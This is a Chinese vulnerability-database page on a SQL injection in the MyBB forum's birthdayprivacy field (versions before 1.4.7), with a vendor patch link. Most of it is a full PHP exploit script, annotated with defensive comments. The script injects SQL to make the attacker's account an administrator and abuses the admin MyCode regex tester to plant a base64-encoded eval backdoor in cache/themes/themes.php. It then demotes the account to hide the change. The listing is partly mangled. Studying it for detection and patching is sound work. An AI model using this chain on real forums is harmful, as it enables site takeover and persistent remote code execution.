MyBB birthdayprivacy参数SQL注入漏洞
影响版本:
MyBB < 1.4.7
漏洞描述:
BUGTRAQ ID: 35458
MyBB是一款流行的Web论坛程序。
MyBB没有正确地验证用户请求中提交给inc/datahandlers/user.php模块的birthdayprivacy参数,远程攻击者可以通过向论坛提交恶意请求执行SQL注入攻击,导致获得论坛的管理权限。成功利用这个漏洞要求打开了MyBB的不可视模式且拥有有效的登录凭据。<*参考
http://milw0rm.com/exploits/9001
http://secunia.com/advisories/35517/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<?PHP
// Instantiating the class runs the whole chain from __construct() with no
// further input; nothing below is reachable without valid forum credentials
// (the constructor and init() both die() otherwise). The listing has been
// mangled by extraction and does not parse as published.
mybb = new maibibi2;
/**
 * Proof of concept published with BUGTRAQ ID 35458 for MyBB < 1.4.7. The
 * birthdayprivacy profile field handled by inc/datahandlers/user.php is
 * evidently interpolated into the profile UPDATE without escaping: the
 * payload in user2admin() closes the quoted value and appends further SET
 * assignments (usergroup=4), after which the tool reports "You're now
 * admin". The listing was mangled on extraction (it does not parse as
 * published) and is kept verbatim as a reference for the attack chain, not
 * as a tool.
 *
 * Defensive notes:
 *  - Fix: upgrade to MyBB 1.4.7 or later (vendor link at the end of the
 *    page); the datahandler must escape/validate birthdayprivacy like any
 *    other profile field.
 *  - Detection: a POST to usercp.php with action=do_profile whose
 *    birthdayprivacy value contains a quote or "usergroup=" is not a
 *    legitimate request. Follow-on indicators this chain leaves: a user row
 *    whose usergroup, email and regip changed together (user2admin /
 *    admin2user), a forged client-ip request header, a hit on the admin
 *    MyCode test endpoint (module=config/mycode&action=xmlhttp_test_mycode)
 *    carrying a regex that looks like it has an "e" modifier, and PHP
 *    appended to cache/themes/themes.php.
 *  - The run ends by reverting usergroup to 2 (admin2user), so the account
 *    looks ordinary afterwards; the file under cache/themes/ and the
 *    database/audit trail are the durable evidence, not the current group.
 */
class maibibi2
{
// Reads CLI options, fixes a spoofed client-ip and User-Agent, and runs the
// chain. --onlyadmin2user is read into oa2u but never consulted anywhere in
// this listing.
function __construct ()
{
this->user = this->get_argv('-u');
this->pass = this->get_argv('-p');
this->target = this->get_argv('-t');
this->admindir = this->get_argv('--admindir');
this->oa2u = this->get_argv('--onlyadmin2user');
// Sent as a "client-ip" header on every request; a forged value here is
// one of the few request-level artefacts of this tool.
this->ip = '67.167.124.135';
this->ua = 'Mozilla 5.0';
// Path (relative to the forum root) that rce() appends PHP to and
// checkrce() then requests.
this->bckdr = '/cache/themes/themes.php';
if (this->get_argv('--help') !== False || this->get_argv('-h') !== False) this->help();
if (!this->user || !this->pass) die ("You have to insert User/Password/r/nUse --help or -h for more informations./r/n");
if (!this->target) die ("You have to insert Target/r/nUse --help or -h for more informations./r/n");
this->http();
this->init();
}
// Stub; --help / -h only prints this and exits.
function help ()
{
die ("Under Construction/r/n");
}
// Returns the argv element following `what`, or False when absent.
// array_search is non-strict and the result is tested with `!`, so a match
// at index 0 would read as "missing" (harmless here: index 0 is the script
// name). No bounds check on n+1.
function get_argv (what)
{
global argv;
if (!n = array_search(what, argv)) return False;
return argv[n+1];
}
// Drives the chain; every step die()s on failure, so a partial run is
// possible. Order: login -> CSRF token -> invisible mode -> SQL injection
// (usergroup=4) -> admin CP login -> PHP stub written via the MyCode test
// endpoint -> verification -> SQL injection again (usergroup=2).
function init ()
{
set_time_limit(0); // about 30 seconds left? Be serious.
echo "[.] Initialing./r/n";
if (!this->mybbuser = this->ilovecookies ()) die ("Incorrect credentials./r/n");
echo "[+] Logged in./r/n";
if (!this->mypostkey = this->getmypostkey()) die ("My_Post_Key Not Found./r/n");
echo "[+] my_post_key variable found./r/n";
// The advisory states invisible mode is a precondition for successful
// exploitation; the reason is not visible in this listing.
this->hidemefromonlinelist();
echo "[+] Turned On mybb's invisible mode./r/n";
this->user2admin();
echo "[+] Sql code injected. You're now admin./r/n";
if (!this->admindir && !this->admindir = this->findadmindir()) die ("Unable to find admin Dir./r/nWhatever it's possible your user is currently an administrator./r/nIf you know admin dir path, you may use --admindir/r/n");
echo "[+] Admindir found (or --admindir is used): {this->admindir}./r/n";
if (!this->adminsid = this->loginadmin()) die ("[-] Unable to login as admin./r/nWhatever it's possible your user is currently an administrator./r/n");
echo "[+] Admin sid Found: {this->adminsid}/r/n";
#this->writabledirs();
this->rce ();
if (!this->checkrce ()) die ("Unable to Execute PHP Code./r/nWhatever it's possible your user is currently an administrator./r/n");
echo "[+] Site correctly backdoored./r/n";
// Reverts the group so the account no longer looks privileged; the
// appended file is what persists.
this->admin2user();
echo "[+] Sql code injected. You're now user./r/n";
echo "[+] Backdoor URI: {this->target}{this->bckdr}/r/n";
echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it./r/nHave a nice day :P/r/n/r/n";
}
// Posts the ordinary member login form and returns the mybbuser cookie
// value scraped from the response, or False. A failed socket connect
// returns an error string from conn(), which is regex-searched like any
// other response.
function ilovecookies ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua);
this->postdata = array ('username' => this->user, 'password' => this->pass, 'submit' => 'Login', 'action' => 'do_login');
rsp = this->post ("{this->target}/member.php");
if (!preg_match_all ('~mybbuser=(.+?);~',rsp,res)) return False;
return res[1][0];
}
// Fetches the profile page and scrapes my_post_key (MyBB's per-session
// CSRF token); the later profile POSTs are rejected without it. The CSRF
// check is therefore in place and is simply satisfied by an authenticated
// user.
function getmypostkey ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/member.php", 'Cookie' => "mybbuser={this->mybbuser};");
rsp = this->get ("{this->target}/usercp.php?action=profile");
if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',rsp,res)) return False;
return res[1][0];
}
// Submits the "invisible" user option (do_options). Response is discarded.
function hidemefromonlinelist()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('my_post_key' => this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options');
rsp = this->post ("{this->target}/member.php");
}
// The vulnerable request: an ordinary do_profile submission in which the
// birthdayprivacy value closes its quote and appends SET assignments.
// Besides usergroup=4 it overwrites email, regip and longregip, so after a
// successful run the stored e-mail and registration IP of the account can
// no longer be trusted as evidence. Response is discarded; success is only
// inferred later by findadmindir()/loginadmin().
function user2admin ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('my_post_key' => this->mypostkey,
'invisible' => '1',
'bday1' => '',
'bday2' => '',
'bday3' => '',
'website' => 'http%3A%2F%2F',
'profile_fields%5Bfid3%5D' => 'Undisclosed',
'profile_fields%5Bfid2%5D' => 'Undisclosed',
'profile_fields%5Bfid1%5D' => 'Undisclosed',
'usertitle' => '',
'icq' => '',
'aim' => '',
'msn' => '',
'yahoo' => '',
'away' => '0',
'awayreason' => '',
'awayday' => '',
'awaymonth' => '',
'awayyear' => '',
'birthdayprivacy' => "all', usergroup=4, email='pr3sident@whit3house.gov',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
'action' => 'do_profile',
'regsubmit' => '1');
rsp = this->post ("{this->target}/usercp.php");
}
// Loads index.php and scrapes the admin CP link that the
// header_welcomeblock_member_admin template shows only to administrators;
// doubles as the check that the injection took effect. The regex literal
// below spans two lines and carries a stray dash -- mangled on extraction.
function findadmindir ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
rsp = this->get("{this->target}/index.php");
if (!preg_match_all ("~<!-- start: header_welcomeblock_member_admin -->
— <a href=/"{this->target}(.+?)/index.php/">~",rsp,res)) return False;
return res[1][0];
}
// Logs into the admin CP with the same credentials and returns the
// adminsid cookie value, or False. An admin CP login by an account that
// was a plain member minutes earlier is the event a SIEM rule should key on.
function loginadmin ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('username' => this->user, 'password' => this->pass, 'do' => 'login');
rsp = this->post ("{this->target}/{this->admindir}/index.php");
if (!preg_match_all ('~adminsid=(.+?);~',rsp,res)) return False;
return res[1][0];
}
// Unused: only referenced from the commented-out call in init(). Just
// requests the admin tools module; the response is discarded.
function writabledirs ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/{this->admindir}/index.php?", 'Cookie' => "mybbuser={this->mybbuser}; adminsid={this->adminsid};");
this->get ("{this->target}/{this->admindir}/index.php?module=tools") ;
}
// Earlier variant, not called from init(). Same MyCode-test vector as
// rce(), but per its own comment it targeted inc/functions.php directly
// (see checkrce_old).
function rceOld ()
{
//edits inc/functions.php (original one)
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{this->target}/{this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={this->mybbuser}; adminsid={this->adminsid};");
this->postdata = array ('my_post_key' => this->mypostkey,
'o_o' => 'phpinfo();',
'regex' => '(.*%3F)#e%00',
'replacement' => 'die(eval(stripslashes(_REQUEST[/'o_o/'])));',
'test_value' => 'XoD');
rsp = this->post ("{this->target}/{this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
}
// Post-exploitation: abuses the admin "test MyCode" AJAX endpoint. The
// regex value appears to carry a PCRE "e" modifier (the "#e" before the
// %00), under which the replacement is evaluated as PHP; the replacement
// base64-decodes o_o, which decodes to a few lines that append a one-line
// eval stub (keyed on request parameter x, cf. checkrce) to the path given
// in `file`, i.e. cache/themes/themes.php. This is a separate weakness from
// the SQL injection: an admin-only regex tester should never let a
// user-supplied modifier reach preg_replace. Response is discarded.
function rce ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{this->target}/{this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={this->mybbuser}; adminsid={this->adminsid};");
this->postdata = array ('my_post_key' => this->mypostkey,
'o_o' => 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7',
'regex' => '(.*%3F)#e%00',
'replacement' => 'die(eval(base64_decode(_REQUEST[/'o_o/'])));',
'test_value' => 'XoD',
'file' => "../{this->bckdr}");
rsp = this->post ("{this->target}/{this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
}
// Same injection as user2admin() with usergroup=2 and a different e-mail:
// demotes the account again so it does not stand out in the member list.
// Forensically, the e-mail/regip columns are overwritten a second time here.
function admin2user ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('my_post_key' => this->mypostkey,
'invisible' => '1',
'bday1' => '',
'bday2' => '',
'bday3' => '',
'website' => 'http%3A%2F%2F',
'profile_fields%5Bfid3%5D' => 'Undisclosed',
'profile_fields%5Bfid2%5D' => 'Undisclosed',
'profile_fields%5Bfid1%5D' => 'Undisclosed',
'usertitle' => '',
'icq' => '',
'aim' => '',
'msn' => '',
'yahoo' => '',
'away' => '0',
'awayreason' => '',
'awayday' => '',
'awaymonth' => '',
'awayyear' => '',
'birthdayprivacy' => "all', usergroup=2, email='pr3sident.whit3house@gmail.com',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
'action' => 'do_profile',
'regsubmit' => '1');
rsp = this->post ("{this->target}/usercp.php");
}
// Verification for rceOld(): requests inc/functions.php directly with the
// trigger in a Cookie and looks for the ".:31337:." marker. Not called.
function checkrce_old ()
{
this->header = array ('client-ip' => this->ip ,'Cookie' => 'x=print /'.:31337:./'%3B;');
rsp = this->get ("{this->target}/{this->admindir}/inc/functions.php?");
if (!strstr(rsp,'.:31337:.')) return False;
else return True;
}
// Requests the appended file with the trigger carried in a Cookie header,
// so the trigger never appears in the query string: a standard access log
// shows only a plain GET of cache/themes/themes.php. Web-server logging of
// cookies, or a rule on direct requests to PHP files under cache/, is
// needed to see this.
function checkrce ()
{
this->header = array ('client-ip' => this->ip ,'Cookie' => 'x=print /'.:31337:./'%3B;');
rsp = this->get ("{this->target}/{this->bckdr}");
if (!strstr(rsp,'.:31337:.')) return False;
else return True;
}
// Initialises the raw-socket HTTP settings used by get()/post()/conn().
// Called once with defaults from __construct(); header/postdata are then
// overwritten before every request.
function http (port = 80, header = array(), post = array(), timeout = 30)
{
this->port = port;
this->timeout = timeout;
this->header = header;
this->postdata = post;
}
// Builds a raw HTTP/1.1 GET from parse_url() parts and this->header, then
// sends it via conn(). Missing query/fragment parts are interpolated as
// empty (a trailing "?" is always sent). No Connection: close header, so
// conn() reads until the server closes the socket.
function get (url)
{
this->url = parse_url(url);
this->packet = array();
this->packet[] = "GET {this->url['path']}?{this->url['query']}{this->url['fragment']} HTTP/1.1";
this->packet[] = "Host: {this->url['host']}";
foreach (this->header as header => value)
{
this->packet[] = "header: value";
}
this->packet[] = "/r/n/r/n";
this->packet = implode ("/r/n",this->packet);
return this->conn();
}
// Builds a raw HTTP/1.1 form POST from this->header and this->postdata.
// Values are concatenated without urlencoding -- the hand-encoded %XX in
// the arrays are relied on, and the injection string goes out with its
// spaces and quotes raw. Same keep-alive caveat as get().
function post (url)
{
this->url = parse_url(url);
this->packet = array();
this->postcontent = '';
this->packet[] = "POST {this->url['path']}?{this->url['query']}{this->url['fragment']} HTTP/1.1";
this->packet[] = "Host: {this->url['host']}";
foreach (this->header as header => value)
{
this->packet[] = "header: value";
}
foreach (this->postdata as post => value)
{
if (this->postcontent != '') this->postcontent .= '&';
this->postcontent .= "post=value";
}
this->packet[] = 'Content-Type: application/x-www-form-urlencoded';
this->packet[] = "Content-Length: ".strlen(this->postcontent)."/r/n";
this->packet[] = this->postcontent;
this->packet = implode ("/r/n",this->packet);
return this->conn();
}
// Opens the socket (URL port, else this->port), writes this->packet and
// reads until EOF. On connect failure it returns an error *string* rather
// than failing, and then still calls fclose() on a non-resource; callers
// regex that string as if it were a response.
function conn()
{
if (!isset(this->url['port'])) this->url['port'] = this->port;
sk = fsockopen (this->url['host'], this->url['port'], eno, estr, this->timeout);
if (!is_resource(sk)) return "[-] Fsockopen Failed! Error: ".estr." [".eno."]" ;
else {
fputs(sk, this->packet);
rsp = "";
while (!feof(sk))
{
rsp .= fgets (sk, 1024);
}
}
fclose(sk);
return rsp;
}
}
?>
SEBUG安全建议:
厂商补丁:
MyBB
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://blog.mybboard.net/2009/06/15/mybb-147-released-security-update/